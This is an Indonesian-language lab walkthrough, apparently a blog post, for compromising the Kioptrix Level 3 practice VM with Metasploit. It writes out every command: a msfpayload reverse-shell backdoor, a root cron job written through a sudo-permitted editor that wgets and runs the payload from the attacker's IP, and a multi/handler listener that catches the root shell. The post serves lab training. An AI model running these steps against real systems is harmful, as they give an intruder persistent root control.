[KIOPTRIX LV3] Metasploit VS Ubuntu

Pada Pentest kali ini, saya akan mendemonstrasikan menyerang web server yang menggunakan Ubuntu dengan Metasploit.

Note: IP address saya 192.168.1.2

Preparation:
1. Metasploit ---> Download Page

Briefing:
1. Buat backdoor
2. Buat Script untuk mendownload backdoor yang sudah kita buat
3. Jalankan exploit multi handler dan Game Over

Walkthrough:

1. Buat backdoor

Buka terminal, lalu masukan perintah:

root@red-dragon:# cd /pentest/exploits/framework2

root@red-dragon:/pentest/exploits/framework2# msfpayload -p linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 X > /var/www/back.door

2. Buat Script untuk mendownload backdoor yang sudah kita buat

Buka terminal, lalu masukan perintah:

Code:

root@red-dragon:/pentest/exploits/framework2# ssh loneferret@kioptrix3.com

Masukan password.
Note: Password bisa dilihat pada post sebelumnya mengenai [KIOPTRIX LV 3] Attack User

Kemudian

Code:

loneferret@kioptrix3:~$ sudo ht

Pada console ht, tekan atl+f kemudian pilih new

Masukan kode berikut:

Code:

* * * * * root cd /tmp/; wget 192.168.1.2/back.door && chmod +x && ./back.door; rm /etc/cron.d/exploit

 Tekan alt+f kemudian pilih save, dan masukan nama file dengan nama /etc/cron.d/exploit

3. Jalankan exploit multi handler dan Game Over

Buka terminal masukan perintah:

root@red-dragon:/pentest/exploits/framework2# msfcli multi/handler PAYLOAD=linux x86/shell/reverse_tcp LHOST=192.168.1.2 LPORT=4444 E

Tunggu sejanak.. Daaaaaaaan..

Berhasil.. Command Shell sesi pertama telah terbuka. Dalam keadaan ini, kita telah mengendalikan system dengan terminal atas nama root (administrator)

Created:
red-dragon

Supported by:
Bule Dragon

Loved by:
Yoshephine Handini

Sumber:
HN-COMMUNITY

Posted in: BACKTRACK